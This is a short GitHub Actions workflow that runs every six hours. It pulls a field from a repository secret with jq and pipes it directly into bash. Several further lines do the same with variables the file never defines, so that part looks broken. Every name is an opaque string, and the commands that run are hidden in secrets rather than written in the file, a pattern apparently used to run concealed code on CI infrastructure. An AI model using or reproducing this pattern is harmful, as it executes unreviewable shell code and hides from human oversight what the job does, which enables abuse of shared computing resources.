name: liyuanzhen4716
on:
  workflow_dispatch:
  schedule:
    - cron: '16 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liyuanzhen4716
        env:
          tb69: ${{ secrets.tb69 }}
        run: |
          echo $tb69 | jq -r .n08 | /bin/bash
          echo $uakl04 | jq -r .kdmnz32 | /bin/bash
          echo $e3 | jq -r .z32 | /bin/bash
          echo $wzmh59542 | jq -r .uq384 | /bin/bash
          echo $zi2682 | jq -r .t01390 | /bin/bash

